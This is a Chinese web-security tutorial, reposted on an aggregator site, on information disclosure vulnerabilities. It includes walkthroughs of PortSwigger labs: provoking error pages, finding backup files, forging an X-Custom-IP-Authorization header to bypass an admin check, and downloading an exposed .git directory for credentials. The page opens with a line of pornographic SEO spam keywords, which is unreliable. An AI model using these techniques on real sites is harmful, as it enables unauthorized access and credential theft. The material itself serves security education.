日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

公司账号密码、通信录泄露屡见不鲜,肆意流淌的敏感信息:WEB安全基础入门—信息泄露漏洞

發布時間:2023/12/10 编程问答 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 公司账号密码、通信录泄露屡见不鲜,肆意流淌的敏感信息:WEB安全基础入门—信息泄露漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

歡迎關注訂閱專欄!
WEB安全系列包括如下三個專欄:

  • 《WEB安全基礎-服務器端漏洞》
  • 《WEB安全基礎-客戶端漏洞》
  • 《WEB安全高級-綜合利用》

知識點全面細致,邏輯清晰、結合實戰,并配有大量練習靶場,讓你讀一篇、練一篇,掌握一篇,在學習路上事半功倍,少走彎路!
歡迎關注訂閱專欄!

  • 專欄文章追求對知識點的全面總結,邏輯嚴密,方便學習掌握。力求做到看完一篇文章,掌握一類漏洞知識。讓讀者簡潔高效的掌握WEB安全知識框架,推開入門深造的大門。
  • 絕不為了追求文章數量,彰顯內容豐富而故意拆散相關知識點。避免讀者沉迷在無盡的技巧中而迷失進階的道路!本系列的目標是授之以漁,而不僅僅是技巧的堆砌。
  • 每篇文章均配有大量靶場,點擊文章中靶場名即可跳轉練習(靶場在網站注冊即可免費使用)。
  • 歡迎訂閱專欄!建議學完兩個基礎專欄,再學習高級哦~

WEB安全基礎入門—信息泄露漏洞

    • 1. 什么是信息泄露漏洞
    • 2. 通常泄露信息的途徑
    • 3. 信息泄露引起的原因
    • 3. 漏洞利用
      • 1. 探測漏洞存在
      • 2. 報錯信息中的信息泄露
      • 3. 隱藏路徑中包含敏感信息
      • 4. 通過備份文件查看源代碼
      • 5. 錯誤配置導致信息泄露
      • 6. 版本控制歷史信息泄露
    • 4. 漏洞實例
      • 1. 錯誤消息中的信息泄漏([Information disclosure in error messages](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-error-messages))
      • 2. 調試頁面上的信息泄露([Information disclosure on debug page](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-on-debug-page))
      • 3. 通過備份文件泄露源代碼([Source code disclosure via backup files](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-via-backup-files))
      • 4. 通過信息泄露繞過身份驗證([Authentication bypass via information disclosure](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass))
      • 5. 版本控制歷史中的信息泄漏 ([Information disclosure in version control history](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-version-control-history))

1. 什么是信息泄露漏洞

網站或應用在響應中無意間泄露的敏感信息,攻擊者獲取到這些敏感信息為后續攻擊做準備。泄露的信息主要包括以下三類:

  • 其他賬戶的數據或財務信息意外泄露
  • 敏感業務數據泄露
  • 網站及其基礎架構技術細節信息泄露

2. 通常泄露信息的途徑

  • 掃描獲得的網站目錄和文件信息。 /cgi-bin/phpinfo 等等
  • /robots.txt、/sitemap.xml君子協定文件里的路徑文件信息
  • 遺漏的臨時備份的源代碼文件/.git /backup等
  • 數據庫報錯或異常響應信息中反饋的內容
  • 應用反饋過多的非必要展示信息
  • 硬編碼寫在源碼中的API KEY 、IP地址、數據庫信息等

3. 信息泄露引起的原因

  • 開發遺留的部分信息,未在上線前進行清理。
  • 不安全的配置導致。比如debug模式上線后未關閉,導致在公開使用時,泄露大量調試報錯信息。
  • 程序設計和實現缺陷。

3. 漏洞利用

1. 探測漏洞存在

滲透測試的一項關鍵技能是能夠隨時隨地識別有價值的信息。下面的幾個具體方法可以用來探測漏洞是否存在:

  • 輸入混淆的參數

一旦對某個參數感興趣,可以將該參數值進行混淆輸入,觀察應用響應。這一步可使用Burp爆破模塊進行大量自動化的混淆測試。

  • 使用掃描器對網站進行掃描
  • 使用Burp或其他相關工具探尋信息
    • search-能在監測的所有數據包中快速篩選指定內容。
    • find comments-在檢測的所有數據包和文件中,快速查找注釋
    • discover content-內容探測,發現隱藏的路徑、敏感信息和文件
  • 使用各種方式,誘使應用響應報錯信息

2. 報錯信息中的信息泄露

例題1

3. 隱藏路徑中包含敏感信息

例題2

4. 通過備份文件查看源代碼

例題 3

5. 錯誤配置導致信息泄露

例題4

6. 版本控制歷史信息泄露

在開發階段經常使用版本控制系統,例如Git 在路徑掃描中有時能發現路徑/.git 可在攻擊端安裝Git,直接拉取下載,來獲取部分源代碼

例題5

4. 漏洞實例

1. 錯誤消息中的信息泄漏(Information disclosure in error messages)

  • 目標

獲取使用框架的版本號

  • 解題思路

抓取數據包/product?productId=20隨意在后面加個特殊符號如'嘗試引起報錯。

HTTP/1.1 500 Internal Server Error Connection: close Content-Length: 1511Internal Server Error: java.lang.NumberFormatException: For input string: "20'"at java.base/java.lang.NumberFormatException.forInputString(NumberFormatException.java:67)at java.base/java.lang.Integer.parseInt(Integer.java:668)at java.base/java.lang.Integer.parseInt(Integer.java:786).......at java.base/java.lang.Thread.run(Thread.java:833)Apache Struts 2 2.3.31

獲取到框架及其版本號

2. 調試頁面上的信息泄露(Information disclosure on debug page)

  • 目標

獲取SECRET_KEY

  • 解題思路

通過路徑掃描,發現/cgi-bin/phpinfo

3. 通過備份文件泄露源代碼(Source code disclosure via backup files)

  • 目標

獲取部分源代碼,找到數據庫密碼

  • 解題思路
  • 存在/robots.txt
HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Connection: close Content-Length: 32User-agent: * Disallow: /backup
  • 訪問/backup存在源代碼備份,從中找到數據庫密碼
  • 4. 通過信息泄露繞過身份驗證(Authentication bypass via information disclosure)

    • 目標

    指定header為本地的用戶才有權限訪問admin, 刪除賬戶carlos
    測試賬戶:wiener:peter

    • 解題思路
    • 掃描發現/admin頁面,嘗試訪問。

    Admin interface only available to local users

  • 使用TRACE 方法 訪問該頁面發現X-Custom-IP-Authorization: IP
  • TRACE /admin/ HTTP/1.1 Host: acd91ff31f481bb2c0acb121008d007b.web-security-academy.net Origin: 127.0.0.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Connection: close Cookie: session=CdwDkeDYoxOtc7RD83dIx71oQaL2kwRx HTTP/1.1 200 OK Content-Type: message/http Connection: close Content-Length: 416TRACE /admin/ HTTP/1.1 Host: acd91ff31f481bb2c0acb121008d007b.web-security-academy.net Origin: 127.0.0.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Connection: close Cookie: session=CdwDkeDYoxOtc7RD83dIx71oQaL2kwRx X-Custom-IP-Authorization: IP
  • 在訪問GET /admin 設置X-Custom-IP-Authorization: 127.0.0.1成功繞過限制
  • GET /admin/ HTTP/1.1 Host: acd91ff31f481bb2c0acb121008d007b.web-security-academy.net X-Custom-IP-Authorization: 127.0.0.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Connection: close Cookie: session=CdwDkeDYoxOtc7RD83dIx71oQaL2kwRx

    5. 版本控制歷史中的信息泄漏 (Information disclosure in version control history)

    • 目標

    獲取administrator密碼, 刪除賬戶carlos

    • 解題思路

    掃描發信版本控制路徑/.git
    使用linux命令拉取下載
    wget -r https://your-lab-id.web-security-academy.net/.git/

    0000000000000000000000000000000000000000 4e09c0b6424c3d3ef8c3a5bc704d8267f2734808 Carlos Montoya <carlos@evil-user.net> 1654060361 +0000 commit (initial): Add skeleton admin panel 4e09c0b6424c3d3ef8c3a5bc704d8267f2734808 bc92290a11f85897017c0ff4d0e0a89505f8fbcf Carlos Montoya <carlos@evil-user.net> 1654060361 +0000 commit: Remove admin password from config 使用diff命令查看變化,可獲取到administrator密碼

    總結

    以上是生活随笔為你收集整理的公司账号密码、通信录泄露屡见不鲜,肆意流淌的敏感信息:WEB安全基础入门—信息泄露漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。